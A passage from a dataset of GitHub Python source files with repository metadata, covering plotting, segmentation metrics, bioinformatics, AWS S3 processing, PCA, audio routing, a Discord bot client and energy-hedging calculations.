\"mean_absolute_percentage_error\", \"avg_dist\"])\ntable.add_row([\"static_read\", *stats(static_read, static_target)])\ntable.add_row([\"static_predict\", *stats(static_predicts, static_target)])\ntable.add_row([\"dynamic_read\", *stats(dynamic_read, dynamic_target)])\ntable.add_row([\"dynamic_predict\", *stats(dynamic_predicts, dynamic_target)])\n\nprint(table)\n\n\n# rotate all data 90 degrees\ndynamic_read_rotated = np.rot90(dynamic_read)\ndynamic_predicts_rotated = np.rot90(dynamic_predicts)\ndynamic_target_rotated = np.rot90(dynamic_target)\n\nstatic_read_rotated = np.rot90(static_read)\nstatic_predicts_rotated = np.rot90(static_predicts)\nstatic_target_rotated = np.rot90(static_target)\n\nplt.title(\"Dynamic\")\nplt.scatter(\n dynamic_read_rotated[0], dynamic_read_rotated[1], c='blue', label='read', s=1)\nplt.scatter(dynamic_predicts_rotated[0], dynamic_predicts_rotated[1],\n c='red', label='predicted', s=1)\nplt.scatter(dynamic_target_rotated[0], dynamic_target_rotated[1],\n c='green', label='target', s=1)\n\nplt.legend()\nplt.ylabel(\"y\", loc='top')\nplt.xlabel(\"x\", loc='right')\n\nplt.savefig(OUTPUT_DIR + \"/dynamic.png\")\n\nplt.clf()\n\n\nplt.title(\"Static\")\nplt.scatter(static_predicts_rotated[0], static_predicts_rotated[1],\n c='red', label='predicted', s=1)\nplt.scatter(\n static_read_rotated[0], static_read_rotated[1], c='blue', label='read', s=1)\nplt.scatter(static_target_rotated[0], static_target_rotated[1],\n c='green', label='target', s=1)\n\nplt.legend()\nplt.ylabel(\"y\", loc='top')\nplt.xlabel(\"x\", loc='right')\n\nplt.savefig(OUTPUT_DIR + \"/static.png\")\n\n\n# zapis średnich odległości do xls\nbook = Workbook()\nsheet = book.active\ndistances = calc_distances(dynamic_predicts, dynamic_target)\nfor distance in distances:\n sheet.append([distance])\nbook.save(OUTPUT_DIR + \"/error_distribution.xlsx\")\n\n\n# zapis wag do json\nclass NumpyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\nwith open(OUTPUT_DIR + \"/weights.json\", \"w\") as f:\n json.dump(clf.coefs_, f, ensure_ascii=False, indent=2, cls=NumpyEncoder)\n","repo_name":"XDesu/SISE_zad2_neurony","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41268641659","text":"class Payslips:\r\n def __init__(self, name, payment, amount) -> None:\r\n self.name = name\r\n self.payment = payment\r\n self.amount = amount\r\n\r\n def pay(self):\r\n self.payment = \"yes\"\r\n\r\n def status(self):\r\n if self.payment == \"yes\":\r\n return self.name + \" is paid \" + str(self.amount)\r\n else:\r\n return self.name + \"is not paid yet\"\r\n \r\nnathan = Payslips(\"Nathan\", \"no\", 1000)\r\nroger = Payslips(\"Roger\", \"no\", 3000)\r\n\r\nprint(nathan.status(), \"\\n\", roger.status())\r\nnathan.pay()\r\nprint(\"After payment\")\r\nprint(nathan.status(), \"\\n\", roger.status())","repo_name":"FelicityTech/Meta-Back-End_Dev","sub_path":"Python/OOP/payment_slip.py","file_name":"payment_slip.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44572809005","text":"import warnings\nimport cv2\nimport os.path\nimport glob\nimport json\nimport numpy as np\nimport torch\nfrom PIL import Image\n\nVOC_CATEGORY_NAMES = ['background',\n 'aeroplane', 'bicycle', 'bird', 'boat', 
'bottle',\n 'bus', 'car', 'cat', 'chair', 'cow',\n 'diningtable', 'dog', 'horse', 'motorbike', 'person',\n 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\n\n\nNYU_CATEGORY_NAMES = ['wall', 'floor', 'cabinet', 'bed', 'chair',\n 'sofa', 'table', 'door', 'window', 'bookshelf',\n 'picture', 'counter', 'blinds', 'desk', 'shelves',\n 'curtain', 'dresser', 'pillow', 'mirror', 'floor mat',\n 'clothes', 'ceiling', 'books', 'refridgerator', 'television',\n 'paper', 'towel', 'shower curtain', 'box', 'whiteboard',\n 'person', 'night stand', 'toilet', 'sink', 'lamp',\n 'bathtub', 'bag', 'otherstructure', 'otherfurniture', 'otherprop']\n\n\ndef eval_semseg(loader, folder, n_classes=20, has_bg=True):\n\n n_classes = n_classes + int(has_bg)\n\n # Iterate\n tp = [0] * n_classes\n fp = [0] * n_classes\n fn = [0] * n_classes\n\n for i, sample in enumerate(loader):\n\n if i % 500 == 0:\n print('Evaluating: {} of {} objects'.format(i, len(loader)))\n\n # Load result\n filename = os.path.join(folder, sample['meta']['image'] + '.png')\n mask = np.array(Image.open(filename)).astype(np.float32)\n\n gt = sample['semseg']\n valid = (gt != 255)\n\n if mask.shape != gt.shape:\n warnings.warn('Prediction and ground truth have different size. Resizing Prediction..')\n mask = cv2.resize(mask, gt.shape[::-1], interpolation=cv2.INTER_NEAREST)\n\n # TP, FP, and FN evaluation\n for i_part in range(0, n_classes):\n tmp_gt = (gt == i_part)\n tmp_pred = (mask == i_part)\n tp[i_part] += np.sum(tmp_gt & tmp_pred & valid)\n fp[i_part] += np.sum(~tmp_gt & tmp_pred & valid)\n fn[i_part] += np.sum(tmp_gt & ~tmp_pred & valid)\n\n jac = [0] * n_classes\n for i_part in range(0, n_classes):\n jac[i_part] = float(tp[i_part]) / max(float(tp[i_part] + fp[i_part] + fn[i_part]), 1e-8)\n\n # Write results\n eval_result = dict()\n eval_result['jaccards_all_categs'] = jac\n eval_result['mIoU'] = np.mean(jac)\n\n return eval_result\n\n\nclass SemsegMeter(object):\n def __init__(self, database):\n if database == 'PASCALContext':\n n_classes = 20\n cat_names = VOC_CATEGORY_NAMES\n has_bg = True\n \n elif database == 'NYUD':\n n_classes = 40\n cat_names = NYU_CATEGORY_NAMES\n has_bg = False\n \n else:\n raise NotImplementedError\n \n self.n_classes = n_classes + int(has_bg)\n self.cat_names = cat_names\n self.tp = [0] * self.n_classes\n self.fp = [0] * self.n_classes\n self.fn = [0] * self.n_classes\n\n @torch.no_grad()\n def update(self, pred, gt):\n pred = pred.squeeze()\n gt = gt.squeeze()\n valid = (gt != 255)\n \n for i_part in range(0, self.n_classes):\n tmp_gt = (gt == i_part)\n tmp_pred = (pred == i_part)\n self.tp[i_part] += torch.sum(tmp_gt & tmp_pred & valid).item()\n self.fp[i_part] += torch.sum(~tmp_gt & tmp_pred & valid).item()\n self.fn[i_part] += torch.sum(tmp_gt & ~tmp_pred & valid).item()\n\n def reset(self):\n self.tp = [0] * self.n_classes\n self.fp = [0] * self.n_classes\n self.fn = [0] * self.n_classes\n \n def get_score(self, verbose=True):\n jac = [0] * self.n_classes\n for i_part in range(self.n_classes):\n jac[i_part] = float(self.tp[i_part]) / max(float(self.tp[i_part] + self.fp[i_part] + self.fn[i_part]), 1e-8)\n\n eval_result = dict()\n eval_result['jaccards_all_categs'] = jac\n eval_result['mIoU'] = np.mean(jac)\n\n\n if verbose:\n print('\\nSemantic Segmentation mIoU: {0:.4f}\\n'.format(100 * eval_result['mIoU']))\n class_IoU = eval_result['jaccards_all_categs']\n for i in range(len(class_IoU)):\n spaces = ''\n for j in range(0, 20 - len(self.cat_names[i])):\n spaces += ' '\n 
print('{0:s}{1:s}{2:.4f}'.format(self.cat_names[i], spaces, 100 * class_IoU[i]))\n\n return eval_result\n\n\ndef eval_semseg_predictions(database, save_dir, overfit=False):\n \"\"\" Evaluate the segmentation maps that are stored in the save dir \"\"\"\n\n # Dataloaders\n if database == 'PASCALContext':\n from data.pascal_context import PASCALContext\n n_classes = 20\n cat_names = VOC_CATEGORY_NAMES\n has_bg = True\n gt_set = 'val'\n db = PASCALContext(split=gt_set, do_edge=False, do_human_parts=False, do_semseg=True,\n do_normals=False, overfit=overfit)\n \n elif database == 'NYUD':\n from data.nyud import NYUD_MT\n n_classes = 40\n cat_names = NYU_CATEGORY_NAMES\n has_bg = False\n gt_set = 'val'\n db = NYUD_MT(split=gt_set, do_semseg=True, overfit=overfit)\n \n else:\n raise NotImplementedError\n \n base_name = database + '_' + 'test' + '_semseg'\n fname = os.path.join(save_dir, base_name + '.json')\n\n # Eval the model\n print('Evaluate the saved images (semseg)')\n eval_results = eval_semseg(db, os.path.join(save_dir, 'semseg'), n_classes=n_classes, has_bg=has_bg)\n with open(fname, 'w') as f:\n json.dump(eval_results, f)\n \n # Print results\n class_IoU = eval_results['jaccards_all_categs']\n mIoU = eval_results['mIoU']\n\n print('\\nSemantic Segmentation mIoU: {0:.4f}\\n'.format(100 * mIoU))\n for i in range(len(class_IoU)):\n spaces = ''\n for j in range(0, 15 - len(cat_names[i])):\n spaces += ' '\n print('{0:s}{1:s}{2:.4f}'.format(cat_names[i], spaces, 100 * class_IoU[i]))\n\n return eval_results\n","repo_name":"SimonVandenhende/Multi-Task-Learning-PyTorch","sub_path":"evaluation/eval_semseg.py","file_name":"eval_semseg.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","stars":689,"dataset":"github-code","pt":"53"} +{"seq_id":"4061570452","text":"import sys \n\n\ndef usage():\n print('Usage: python script.py [sam file] [outfile_name]')\n\ndef calculate_ribosome_density_ontrans(input_file, output_file, min_value=23, max_value=35):\n # save in dict\n density_dict = {}\n total_reads = 0\n\n # open sam file\n with open(input_file, \"r\") as reader:\n for line in reader:\n record = line.strip().split(\"\\t\")\n # do something\n if record[1] == \"0\":\n total_reads += 1\n # tags\n refname = record[2]\n align_pos = int(record[3])\n read_length = len(record[9])\n \n # filter read length\n if min_value < read_length < max_value:\n end5 = align_pos\n end3 = end5 + read_length - 1\n # shift +- 11nt\n centerEnd5 = end5 + 11\n centerEnd3 = end3 - 11\n centerLength = centerEnd3 - centerEnd5 + 1\n \n # ribo density\n for elem in range(centerEnd5, centerEnd3 + 1):\n key = f\"{refname}:{elem}\"\n density_dict[key] = density_dict.get(key, 1.0 / centerLength) + 1.0 / centerLength\n else:\n continue\n \n # output file\n with open(output_file, \"w\") as outfile:\n for key in sorted(density_dict.keys()):\n refname, align_pos = key.split(\":\")\n raw_density = density_dict[key]\n \n # RPM normalization\n rpm = (raw_density/total_reads) * 1000000\n outfile.write(f\"{refname}\\t{align_pos}\\t{raw_density}\\t{rpm}\\n\")\n\n\nif __name__ == '__main__':\n try:\n calculate_ribosome_density_ontrans(input_file = sys.argv[1], output_file= sys.argv[2])\n\n except:\n usage()","repo_name":"yuanlizhanshi/NGS_Workflow","sub_path":"Ribo-seq-workflow/script/calculate_ribosome_density.py","file_name":"calculate_ribosome_density.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} 
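The RPM (reads per million) scaling used in the ribosome-density record above is worth one concrete number check:

```python
def rpm(raw_density: float, total_reads: int) -> float:
    # reads-per-million normalization, exactly as in the record
    return raw_density / total_reads * 1_000_000

# a position carrying 2.5 read-units in a library of 8 million mapped reads
print(rpm(2.5, 8_000_000))  # 0.3125
```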
+{"seq_id":"33002538011","text":"import requests\nfrom bs4 import BeautifulSoup\nimport boto3\nimport datetime\nimport json\nimport csv\nimport os\n\n\ndef f():\n\n s3 = boto3.client('s3')\n dt = datetime.date.today()\n \n source_file_name = dt.strftime(\"%Y-%m-%d\")+\".html\"\n csv_file_name ='{dt}.csv'\n \n try:\n s3.download_file('casachechitox', source_file_name, source_file_name)\n \n html_doc = read_file(source_file_name)\n \n div_tag_script = BeautifulSoup.find('script', type='application/ld+json')\n json_text = div_tag_script.string.strip()\n json_file = json.loads(json_text)\n \n create_csv(csv_file_name, json_file)\n\n with open(csv_file_name, 'rb') as csvfile:\n s3.upload_fileobj(csvfile, 'casafinal', '{dt}.csv')\n\n os.remove(source_file_name)\n os.remove('/tmp/' + csv_file_name)\n\n except Exception as e:\n # Handle the exception\n print('error:{e}')\n \n \n return {\n 'statusCode': 200 \n } \n \n \n \ndef create_csv(csv_name, data):\n\n fields = [\"date\", \"@type\", \"name\", \n \"numberOfBedrooms\",\"numberOfBathroomsTotal\",\n \"address.addressRegion\", \"address.addressLocality\",\n \"address.addressCountry.name\",\"floorSize.value\",\"floorSize.unitCode\"]\n\n header_row = dict((field, field) for field in fields)\n\n with open('/tmp/' + csv_name, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fields)\n writer.writerow(header_row)\n\n for item in data['about']:\n row = {\n \"date\":\n datetime.date.today().strftime(\"%Y-%m-%d\"),\n \"@type\":\n item.get('@type', ''),\n \"name\":\n item.get('name', ''),\n \"numberOfBedrooms\":\n item.get('numberOfBedrooms', ''),\n \"numberOfBathroomsTotal\":\n item.get('numberOfBathroomsTotal', ''),\n \"address.addressRegion\":\n item.get('address', {}).get('addressRegion', ''),\n \"address.addressLocality\":\n item.get('address', {}).get('addressLocality', ''),\n \"address.addressCountry.name\":\n item.get('address', {}).get('addressCountry', {}).get('name', ''),\n \"floorSize.value\":\n item.get('floorSize', {}).get('value', {}),\n \"floorSize.unitCode\":\n item.get('floorSize', {}).get('unitCode', {})\n }\n writer.writerow(row)\n\n\ndef read_file(source_file_name):\n\n with open(source_file_name, 'r') as f:\n html_doc = f.read()\n return html_doc\n","repo_name":"chechitox11/Parcial_BigData","sub_path":"lamnda2.py","file_name":"lamnda2.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25530471173","text":"import numpy as np\nimport seaborn as sns\nimport pandas as pd\n\nfrom gaussian import get_samples\nfrom pca import get_principal_axis\nfrom fisher import get_fisher_axis\n\n\ndef map_samples(samples, axis):\n \"\"\"Map samples based on a given axis.\n\n Args:\n samples: samples which have the shape of (n, d).\n axis: 1-dimensional vector which have the shape of (d, ).\n \"\"\"\n # map samples\n samples = np.inner(axis.T, samples)\n\n # reshape samples\n samples = np.reshape(samples, (-1, 1))\n\n return samples\n\n\ndef main():\n \"\"\"Entry point.\"\"\"\n # get samples that follow a Gaussian distribution (1)\n mean1 = (3, 1)\n var1 = ([1, 2], [2, 5])\n samples1, labels1 = get_samples(mean1, var1, dist_id=1)\n\n # get samples that follow a Gaussian distribution (2)\n mean2 = (1, 3)\n var2 = ([1, 2], [2, 5])\n samples2, labels2 = get_samples(mean2, var2, dist_id=2)\n\n # concat samples and labels respectively\n samples = np.concatenate((samples1, samples2), axis=0)\n labels = np.concatenate((labels1, 
+{"seq_id":"25530471173","text":"import numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom gaussian import get_samples\nfrom pca import get_principal_axis\nfrom fisher import get_fisher_axis\n\n\ndef map_samples(samples, axis):\n \"\"\"Map samples based on a given axis.\n\n Args:\n samples: samples which have the shape of (n, d).\n axis: 1-dimensional vector which have the shape of (d, ).\n \"\"\"\n # map samples\n samples = np.inner(axis.T, samples)\n\n # reshape samples\n samples = np.reshape(samples, (-1, 1))\n\n return samples\n\n\ndef main():\n \"\"\"Entry point.\"\"\"\n # get samples that follow a Gaussian distribution (1)\n mean1 = (3, 1)\n var1 = ([1, 2], [2, 5])\n samples1, labels1 = get_samples(mean1, var1, dist_id=1)\n\n # get samples that follow a Gaussian distribution (2)\n mean2 = (1, 3)\n var2 = ([1, 2], [2, 5])\n samples2, labels2 = get_samples(mean2, var2, dist_id=2)\n\n # concat samples and labels respectively\n samples = np.concatenate((samples1, samples2), axis=0)\n labels = np.concatenate((labels1, labels2), axis=0)\n\n # get the 1st principal axis\n pa = get_principal_axis(samples)\n\n # get the fisher axis\n fa = get_fisher_axis(samples1, samples2)\n\n # map into 1d-plane based on `pa`\n pa_samples = map_samples(samples, pa)\n\n # map into 1d-plane based on `fa`\n fa_samples = map_samples(samples, fa)\n\n # plot samples mapped onto the principal axis\n pa_data = np.concatenate((pa_samples, labels), axis=1)\n pa_data = pd.DataFrame(pa_data, columns=['z', 'dist_id'])\n g = sns.FacetGrid(pa_data, hue='dist_id', size=8)\n g.map(plt.hist, 'z', alpha=0.8)\n\n # show a graph\n plt.show()\n\n # plot samples mapped onto the fisher axis\n fa_data = np.concatenate((fa_samples, labels), axis=1)\n fa_data = pd.DataFrame(fa_data, columns=['z', 'dist_id'])\n g = sns.FacetGrid(fa_data, hue='dist_id', size=8)\n g.map(plt.hist, 'z', alpha=0.8)\n\n # show a graph\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hkiyomaru/pra","sub_path":"scripts/0510/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74797447526","text":"#!/usr/bin/env python3\nimport heapq\n\nclass Solution:\n def thirdMax(self, nums: list[int]) -> int:\n nums = list(set(nums))\n if len(nums) < 3:\n return max(nums)\n heap = []\n for i in nums:\n heapq.heappush(heap,i)\n if len(heap) > 3:\n heapq.heappop(heap)\n return heapq.heappop(heap)","repo_name":"femifacia/algorithms","sub_path":"python/algorithms/third_maximum_number/main_min_heap.py","file_name":"main_min_heap.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72412063848","text":"#!/usr/bin/env python3\nimport jack\nimport time\nclient = jack.Client('chrome_tab_linker')\n\nmix_chrome_ports = [('jack_mixer:Chrome 1 L', 'jack_mixer:Chrome 1 R'),\n ('jack_mixer:Chrome 2 L', 'jack_mixer:Chrome 2 R'),\n ('jack_mixer:Chrome 3 L', 'jack_mixer:Chrome 3 R')]\n\nfor i, p in enumerate(mix_chrome_ports):\n mix_chrome_ports[i] = (client.get_port_by_name(p[0]),\n client.get_port_by_name(p[1]))\n\ntempPort = None\n\n@client.set_port_registration_callback\ndef port_registration(port, register):\n\n if \"Google Chrome\" in port.name and register:\n\n global tempPort\n if tempPort is None:\n tempPort = port\n return\n\n for conPorts in client.get_all_connections(port):\n client.disconnect(port, conPorts)\n\n lessUsedPorts = min(mix_chrome_ports, key=lambda x:len(client.get_all_connections(x[0])))\n print(lessUsedPorts)\n\n if port.name[-1] == 'L':\n client.connect(port, lessUsedPorts[0])\n client.connect(tempPort, lessUsedPorts[1])\n elif port.name[-1] == 'R':\n client.connect(port, lessUsedPorts[1])\n client.connect(tempPort, lessUsedPorts[0])\n else:\n print(\"port name does not end with L or R\")\n\n tempPort = None\n\nwith client:\n while True:\n time.sleep(100)","repo_name":"8-Lambda-8/PipeWireConfigs","sub_path":"chromeTabLinker.py","file_name":"chromeTabLinker.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22308031442","text":"import dataclasses\n\nfrom naff import Guild, Member\n\nfrom ElevatorBot.networking.http import BaseBackendConnection\nfrom ElevatorBot.networking.routes import moderation_mute, moderation_warning\nfrom Shared.networkingSchemas.misc.moderation import 
ModerationAddModel, ModerationModel, ModerationsModel\n\n\n@dataclasses.dataclass\nclass Moderation(BaseBackendConnection):\n discord_guild: Guild\n discord_member: Member\n\n async def get_mutes(self) -> ModerationsModel:\n \"\"\"Get all mutes\"\"\"\n\n result = await self._backend_request(\n method=\"GET\",\n route=moderation_mute.format(guild_id=self.discord_guild.id, discord_id=self.discord_member.id),\n )\n\n # convert to correct pydantic model\n return ModerationsModel.parse_obj(result.result)\n\n async def add_mute(self, reason: str, duration_in_seconds: int, mod_discord_id: int) -> ModerationModel:\n \"\"\"Add a mute\"\"\"\n\n result = await self._backend_request(\n method=\"POST\",\n route=moderation_mute.format(guild_id=self.discord_guild.id, discord_id=self.discord_member.id),\n data=ModerationAddModel(\n reason=reason, duration_in_seconds=duration_in_seconds, mod_discord_id=mod_discord_id\n ),\n )\n\n # convert to correct pydantic model\n return ModerationModel.parse_obj(result.result)\n\n async def get_warnings(self) -> ModerationsModel:\n \"\"\"Get all warnings\"\"\"\n\n result = await self._backend_request(\n method=\"GET\",\n route=moderation_warning.format(guild_id=self.discord_guild.id, discord_id=self.discord_member.id),\n )\n\n # convert to correct pydantic model\n return ModerationsModel.parse_obj(result.result)\n\n async def add_warning(self, reason: str, mod_discord_id: int) -> ModerationModel:\n \"\"\"Add a warning\"\"\"\n\n result = await self._backend_request(\n method=\"POST\",\n route=moderation_warning.format(guild_id=self.discord_guild.id, discord_id=self.discord_member.id),\n data=ModerationAddModel(reason=reason, mod_discord_id=mod_discord_id),\n )\n\n # convert to correct pydantic model\n return ModerationModel.parse_obj(result.result)\n","repo_name":"TheDescend/elevatorbot","sub_path":"ElevatorBot/networking/misc/moderation.py","file_name":"moderation.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"6364081334","text":"# -*- coding: utf-8 -*-\nfrom functools import partial\n\nfrom ghrequests.requester import Dispatcher\nfrom pkg_resources import get_distribution, DistributionNotFound\nfrom .requester import Request\n\ntry:\n dist_name = __name__\n __version__ = get_distribution(dist_name).version\nexcept DistributionNotFound:\n __version__ = 'unknown'\nfinally:\n del get_distribution, DistributionNotFound\n\n__all__ = [\n 'get',\n 'post',\n 'put',\n 'head',\n 'patch',\n 'delete',\n 'request',\n 'Request'\n]\n\nget = partial(Request, 'GET')\noptions = partial(Request, 'OPTIONS')\nhead = partial(Request, 'HEAD')\npost = partial(Request, 'POST')\nput = partial(Request, 'PUT')\npatch = partial(Request, 'PATCH')\ndelete = partial(Request, 'DELETE')\nrequest = Request\n\n\ndef request_all(requests, max_connections=None, max_per_domain=None):\n \"\"\"\n Run all requests in parallel, respecting the given limits.\n\n\n :param max_connections: Global max simultaneous connections.\n :param max_per_domain: Max requests per host.\n \"\"\"\n return Dispatcher(max_connections, max_per_domain).run(requests)\n","repo_name":"pappacena/ghrequests","sub_path":"src/ghrequests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5804219701","text":"from multiprocessing.sharedctypes import Value\nimport numpy as np\nimport pandas as 
pd\n\nfrom modules.enums import *\nfrom modules.profile import HourProfile\nfrom modules.tradingProduct import TradingProduct \n\n\nclass Hedging:\n    def __init__(self, to_hedge_profile: HourProfile):\n        self.initial_hourProfile = to_hedge_profile\n        self.__rename_val_col_to_mw()\n        self.hedge_product_selection = []\n        self.hedge_products_list = []\n        self.price_curve = None\n    \n    def calc_quantity_hedges(self, product=Products.cal, hour=Hours.base) -> list:\n        \"\"\"Calculate a quantity hedge based on the profile - product eg. 'Cal' and hours eg. 'Peak' \"\"\"\n        \n        # initialize a new list entry with all the relevant time series for the upcoming hedge.\n        self.hedge_product_selection.append(f'{product} {hour}')\n\n        # calculate the average mw on base or peak and cal / q\n        hedges = self.__get_averages_per_period(hour_profile=self.initial_hourProfile, product=product, hour=hour)\n        \n        # store hedges\n        self.hedge_products_list.extend(hedges)\n\n        # return the hedge table as df\n        return hedges\n\n\n    def calc_value_hedges(self, product=Products.cal, hour=Hours.base) -> list:\n        \n        # in case of value-hedging use a MW*CHF profile instead of an MW profile -> the curve has to be added beforehand with the add_price_curve method\n        profile = self.initial_hourProfile.df_profile.copy()\n        if not isinstance(self.price_curve, HourProfile):\n            errorstr = 'No price curve found. Please add a price curve first via the add_price_curve method'\n            raise ValueError(errorstr)\n        profile['chf'] = self.initial_hourProfile.df_profile['mw'] * self.price_curve.df_profile[self.price_curve.name_val]\n\n        value_hour_profile = HourProfile(profile['chf'], name_val=Values.chf, type='value_profile')\n\n        # calculate the average CHF value on base or peak and cal / q\n        average_chf_values = self.__get_averages_per_period(hour_profile=value_hour_profile, product=product, hour=hour)\n\n        # calculate the average price of the price curve in CHF/MWh\n        average_market_prices = self.__get_averages_per_period(hour_profile=self.price_curve, product=product, hour=hour)\n\n        value_hedges = []\n        for idx, tp in enumerate(average_chf_values):\n            # divide the average chf value of each TradingProduct by the market price of the matching market product to get the value hedge MW\n            mw = tp.trading_product_divided_other(average_market_prices[idx])\n            \n            # create the new value hedge TradingProduct\n            value_hedges.append(TradingProduct(\n                type=tp.info['type'],\n                start=tp.info['start'],\n                end=tp.info['end'],\n                mw = mw\n            ))\n        \n        # store hedges\n        self.hedge_products_list.extend(value_hedges)\n        \n        return value_hedges\n\n\n
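[Editorial aside] What `__get_averages_per_period` (further below) boils down to for a quantity hedge is a per-period mean over base or peak hours. A compact pandas sketch with synthetic data, using the common 08-20 weekday peak definition (column names and the peak rule are ours, not from this repo):

```python
import pandas as pd

idx = pd.date_range("2024-01-01", periods=8760, freq="h")
profile = pd.DataFrame({"mw": 100.0}, index=idx)

is_peak = idx.hour.isin(range(8, 20)) & (idx.weekday < 5)
profile.loc[is_peak, "mw"] = 160.0  # more load in peak hours

quarters = idx.to_period("Q")
base_mw = profile["mw"].groupby(quarters).mean()                        # quarterly base hedge
peak_mw = profile.loc[is_peak, "mw"].groupby(quarters[is_peak]).mean()  # quarterly peak hedge

print(base_mw.round(2))
print(peak_mw.round(2))
```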
    def combinations_of_hedge(self, base_product:Products=Products.none, peak_product:Products=Products.none, hedge_type:HedgeType=HedgeType.quantity):\n        hedges_list_combinations = []\n\n        # only base\n        if base_product and not peak_product:\n            hedges = self.__return_hedge_based_on_type(hedge_type=hedge_type, product=base_product, hour=Hours.base)\n            hedges_list_combinations.extend(hedges)\n\n        # only peak\n        elif not base_product and peak_product:\n            hedges = self.__return_hedge_based_on_type(hedge_type=hedge_type, product=peak_product, hour=Hours.peak)\n            hedges_list_combinations.extend(hedges)\n\n        # base and peak products\n        if base_product and peak_product:\n            # the base hedge is set to the off-peak quantity\n            hedges_base = self.__return_hedge_based_on_type(hedge_type=hedge_type, product=base_product, hour=Hours.off_peak)\n            for hedge in hedges_base:\n                hedge.set_type(Hours.base) \n            hedges_list_combinations.extend(hedges_base)\n\n            # peak quantity calculation\n            hedges_peak = self.__return_hedge_based_on_type(hedge_type=hedge_type, product=peak_product, hour=Hours.peak)\n\n            for index, hedge_peak in enumerate(hedges_peak):\n                # same duration of products, i.e. both cal or both q\n                if base_product == peak_product:\n                    # subtract base from peak hedge \n                    hedge_peak.set_mw(hedge_peak.trading_product_minus_other(hedges_base[index]))\n                \n                \n                # base in cal and peak in q \n                if base_product==Products.cal and peak_product==Products.q:\n                    # peak hedges are the calculated peak hedges minus the cal base hedge\n                    hedge_peak.set_mw(hedge_peak.trading_product_minus_other(hedges_base[0]))\n\n            hedges_list_combinations.extend(hedges_peak)\n\n        return hedges_list_combinations\n\n    def initial_profile_minus_all_hedges(self) -> tuple:\n        \"\"\" \n        returns a tuple of HourProfile objects calculated as the initial profile minus all hedges.\n        first element: profile with positive and negative values\n        second element: the profile with the positive values\n        third element: the negative values of the profile transformed to positive values \n        \"\"\"\n        \n        list_of_df = []\n        for trading_product in self.hedge_products_list:\n            list_of_df.append(trading_product.generateProfile().df_profile)\n        concated = pd.concat(list_of_df, axis=1)\n        \n        if len(self.hedge_products_list) >1:\n            summed_hedge_profile = concated['mw'].sum(axis=1)\n        else:\n            summed_hedge_profile = concated['mw']\n\n        res = (self.initial_hourProfile.df_profile['mw'] - summed_hedge_profile).to_frame(name='mw')\n        pos = res['mw'] > 0\n        \n        res['pos'] = res['mw']\n        res['pos'].loc[~pos] = 0\n        \n        res['neg'] = res['mw']\n        res['neg'].loc[pos] = 0\n        res['neg'] = res['neg'].abs()\n\n        return (\n            HourProfile(profile=res['mw'], name_val=Values.mw, type='residual_all'),\n            HourProfile(profile=res['pos'], name_val=Values.mw, type='residual_pos'),\n            HourProfile(profile=res['neg'], name_val=Values.mw, type='residual_neg'),\n        )\n\n    def print_all_mwh_of_residual(self):\n        res_profiles = self.initial_profile_minus_all_hedges()\n        for pro in res_profiles:\n            print(f'{pro.type} with {pro.get_sum_of_profile()} Mwh')\n\n    def print_hedges(self):\n        for trading_prod in self.hedge_products_list:\n            print(trading_prod)\n\n    def clear_previous_hedges(self):\n        self.hedge_product_selection = []\n        self.hedge_products_list = []\n        self.hedge_timeseries_df = []\n\n    def add_price_curve(self, price_curve:HourProfile):\n        price_curve.trim_date_to_other_hourProfile(self.initial_hourProfile)\n        self.price_curve = price_curve\n\n    def to_list_of_trading_products(self, profile:pd.DataFrame, product:Products, hour:Hours):\n        # group the profile DF and build one hedge object from each group\n        temp_df_grouped = profile.groupby('hedge_group')\n        \n        out_list = []\n\n        for name, group in temp_df_grouped:\n\n            out_list.append(TradingProduct(\n                type=hour, \n                mw=group['average'].mean().round(2), # round to 2 digits \n                start=group['start'].iloc[0].strftime('%Y-%m-%d %H:00'), \n                end= group['end'].iloc[0].strftime('%Y-%m-%d %H:00')))\n        return out_list\n\n    def __get_averages_per_period(self, hour_profile:HourProfile, product=Products.cal, hour=Hours.base) -> list:\n        \"\"\"Calculate the average on the profile - product eg. 'Cal' and hours eg. 
